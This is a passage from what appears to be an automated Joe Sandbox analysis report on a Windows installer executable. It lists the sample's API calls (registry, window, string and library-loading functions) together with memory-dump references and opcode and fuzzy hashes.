                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                        • String ID: verifying installer: %d%%
                                                                                                                        • API String ID: 1451636040-82062127
                                                                                                                        • Opcode ID: 82db8536561177d1b172f5ac56095865a7e50fae45f9622e7ddcc8e846317807
                                                                                                                        • Instruction ID: c6984150c403b35497dc18a40ce28a5dc8b104db4e9527dfc76b44ca96ff41d6
                                                                                                                        • Opcode Fuzzy Hash: 82db8536561177d1b172f5ac56095865a7e50fae45f9622e7ddcc8e846317807
                                                                                                                        • Instruction Fuzzy Hash: 5D01FF70A44208BBEB209F60DD49EEE3769FB04345F008039FA06A92D1D7B5AA558F99
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000000,?), ref: 00402A8A
                                                                                                                        • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AC6
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00402ACF
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00402AF4
                                                                                                                        • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B12
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Close$DeleteEnumOpen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1912718029-0
                                                                                                                        • Opcode ID: 5d0b6e0ce49e1b9a68b8278243b858d166325889e329a7d8d46ece79ca10f327
                                                                                                                        • Instruction ID: fd754328231b90d3809392cacc3778cc58b9849b8c5c25df110c081a09ace752
                                                                                                                        • Opcode Fuzzy Hash: 5d0b6e0ce49e1b9a68b8278243b858d166325889e329a7d8d46ece79ca10f327
                                                                                                                        • Instruction Fuzzy Hash: 29116D71A0000AFEDF219F90DE49DAE3B79FB14345B104076FA05A00E0DBB89E51AFA9
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • GetDlgItem.USER32(?), ref: 00401CE2
                                                                                                                        • GetClientRect.USER32(00000000,?), ref: 00401CEF
                                                                                                                        • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D10
                                                                                                                        • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D1E
                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00401D2D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1849352358-0
                                                                                                                        • Opcode ID: b6dc52a7f50dc5a5b8d69a970bc0364d2e288b966cb10631b9234e7e7e1bdde9
                                                                                                                        • Instruction ID: 6b5de524c76fb4cd20547a313357388a8ed9b6ad8842e2156e420fd608a0a23d
                                                                                                                        • Opcode Fuzzy Hash: b6dc52a7f50dc5a5b8d69a970bc0364d2e288b966cb10631b9234e7e7e1bdde9
                                                                                                                        • Instruction Fuzzy Hash: 75F0EC72A04118AFD701EBA4DE88DAFB77CFB44305B14443AF501F6190C7749D019B79
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • lstrlenA.KERNEL32(00420538,00420538,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404564,000000DF,00000000,00000400,?), ref: 004046E7
                                                                                                                        • wsprintfA.USER32 ref: 004046EF
                                                                                                                        • SetDlgItemTextA.USER32(?,00420538), ref: 00404702
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ItemTextlstrlenwsprintf
                                                                                                                        • String ID: %u.%u%s%s
                                                                                                                        • API String ID: 3540041739-3551169577
                                                                                                                        • Opcode ID: 9ec326ac30901ad515aaf80f2404a58f9bab4133aba90e091d0e9c932beca6f7
                                                                                                                        • Instruction ID: 33c490f36d39f428f4b6feb88c055206d8f5fbd89635bf607d329e374d543c8d
                                                                                                                        • Opcode Fuzzy Hash: 9ec326ac30901ad515aaf80f2404a58f9bab4133aba90e091d0e9c932beca6f7
                                                                                                                        • Instruction Fuzzy Hash: 5A11D873A0512437EB0065699C41EAF329CDB82335F150637FE26F31D1E9B9DD1145E8
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                                                                                        • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C42
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$Timeout
                                                                                                                        • String ID: !
                                                                                                                        • API String ID: 1777923405-2657877971
                                                                                                                        • Opcode ID: 5e155985e8b695c365f3075347fc5cad64183b83899d6bbba3f89d2116927a25
                                                                                                                        • Instruction ID: 8eb34b9659dedbc099cc11ce9bc18cab6bc834bdcc036981f8d30f042af137bc
                                                                                                                        • Opcode Fuzzy Hash: 5e155985e8b695c365f3075347fc5cad64183b83899d6bbba3f89d2116927a25
                                                                                                                        • Instruction Fuzzy Hash: C621A171A44149BEEF02AFF4C94AAEE7B75EF44704F10407EF501BA1D1DAB88A40DB29
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • SetWindowTextA.USER32(00000000,jtlkrtaftpgmppuxhth Setup), ref: 0040394C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: TextWindow
                                                                                                                        • String ID: "C:\Users\user\Desktop\BMhDm7YW62.exe"$1033$jtlkrtaftpgmppuxhth Setup
                                                                                                                        • API String ID: 530164218-1913988077
                                                                                                                        • Opcode ID: efc42492ee7b8a51a3ec7fa34d8682ca64c79934ee229eb602048578ff3af0eb
                                                                                                                        • Instruction ID: 9405f6c8d043b7fcf606726b90d8bdb5e10644d2b1bbff0bcd5da451eaf68503
                                                                                                                        • Opcode Fuzzy Hash: efc42492ee7b8a51a3ec7fa34d8682ca64c79934ee229eb602048578ff3af0eb
                                                                                                                        • Instruction Fuzzy Hash: D211CFB1F006119BC7349F15E88093777BDEB89716369817FE801A73E0D67DAE029A98
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004030E8,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 00405691
                                                                                                                        • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004030E8,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 0040569A
                                                                                                                        • lstrcatA.KERNEL32(?,00409010), ref: 004056AB
                                                                                                                        Strings
                                                                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 0040568B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CharPrevlstrcatlstrlen
                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                        • API String ID: 2659869361-1881609536
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00401FAF
                                                                                                                          • Part of subcall function 00404E84: lstrlenA.KERNEL32(0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000,?), ref: 00404EBD
                                                                                                                          • Part of subcall function 00404E84: lstrlenA.KERNEL32(00402FBE,0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000), ref: 00404ECD
                                                                                                                          • Part of subcall function 00404E84: lstrcatA.KERNEL32(0041FD10,00402FBE,00402FBE,0041FD10,00000000,0040F0E0,00000000), ref: 00404EE0
                                                                                                                          • Part of subcall function 00404E84: SetWindowTextA.USER32(0041FD10,0041FD10), ref: 00404EF2
                                                                                                                          • Part of subcall function 00404E84: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F18
                                                                                                                          • Part of subcall function 00404E84: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F32
                                                                                                                          • Part of subcall function 00404E84: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F40
                                                                                                                        • LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FBF
                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00401FCF
                                                                                                                        • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040203A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2987980305-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402374
                                                                                                                        • lstrlenA.KERNEL32(0040A410,00000023,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402394
                                                                                                                        • RegSetValueExA.ADVAPI32(?,?,?,?,0040A410,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004023CD
                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,0040A410,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004024B0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseCreateValuelstrlen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1356686001-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • CharNextA.USER32(004054D1,?,C:\,00000000,00405783,C:\,C:\,?,?,?,004054D1,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040572D
                                                                                                                        • CharNextA.USER32(00000000), ref: 00405732
                                                                                                                        • CharNextA.USER32(00000000), ref: 00405741
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CharNext
                                                                                                                        • String ID: C:\
                                                                                                                        • API String ID: 3213498283-3404278061
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • GetDC.USER32(?), ref: 00401D3F
                                                                                                                        • GetDeviceCaps.GDI32(00000000), ref: 00401D46
                                                                                                                        • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D55
                                                                                                                        • CreateFontIndirectA.GDI32(0040B014), ref: 00401DA7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CapsCreateDeviceFontIndirect
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3272661963-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • DestroyWindow.USER32(00000000,00000000,00402DD1,00000001), ref: 00402C04
                                                                                                                        • GetTickCount.KERNEL32 ref: 00402C22
                                                                                                                        • CreateDialogParamA.USER32(0000006F,00000000,00402B6E,00000000), ref: 00402C3F
                                                                                                                        • ShowWindow.USER32(00000000,00000005), ref: 00402C4D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2102729457-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • IsWindowVisible.USER32(?), ref: 00404E0A
                                                                                                                        • CallWindowProcA.USER32(?,00000200,?,?), ref: 00404E78
                                                                                                                          • Part of subcall function 00403EA0: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00403EB2
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$CallMessageProcSendVisible
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3748168415-3916222277
                                                                                                                        • Opcode ID: d178a5782ca8d626d003a390d0a002469a0ac64d132e68a5e4d1ef6bfeb92247
                                                                                                                        • Instruction ID: 907b3508a45335f305929b628defbf7950d0c65962cf50d158fef9db48df65ea
                                                                                                                        • Opcode Fuzzy Hash: d178a5782ca8d626d003a390d0a002469a0ac64d132e68a5e4d1ef6bfeb92247
                                                                                                                        • Instruction Fuzzy Hash: 3B11BF71600208BFDF21AF61DC4099B3769BF843A5F40803BF604791A2C7BC4991DFA9
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,?,0040352E,00403337,00000020), ref: 00403570
                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00403577
                                                                                                                        Strings
                                                                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00403568
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Free$GlobalLibrary
                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                        • API String ID: 1100898210-1881609536
                                                                                                                        • Opcode ID: a60e2798f856a3438fb1e72b6635fdebc83eaeade0927d8150105d3265ee1b70
                                                                                                                        • Instruction ID: e2315670824f3ca0981a6a6bf9743b5050639b1b799e450ff7e3175358b78d1c
                                                                                                                        • Opcode Fuzzy Hash: a60e2798f856a3438fb1e72b6635fdebc83eaeade0927d8150105d3265ee1b70
                                                                                                                        • Instruction Fuzzy Hash: 10E08C329010206BC6215F08FD0479A7A6C6B44B22F11413AE804772B0C7742D424A88
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CC1,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\BMhDm7YW62.exe,C:\Users\user\Desktop\BMhDm7YW62.exe,80000000,00000003), ref: 004056D8
                                                                                                                        • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CC1,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\BMhDm7YW62.exe,C:\Users\user\Desktop\BMhDm7YW62.exe,80000000,00000003), ref: 004056E6
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CharPrevlstrlen
                                                                                                                        • String ID: C:\Users\user\Desktop
                                                                                                                        • API String ID: 2709904686-4267323751
                                                                                                                        • Opcode ID: 5e76a858232fdb919b52e4d2bd39b139441124952f2503eefa3b06bf6f304fbe
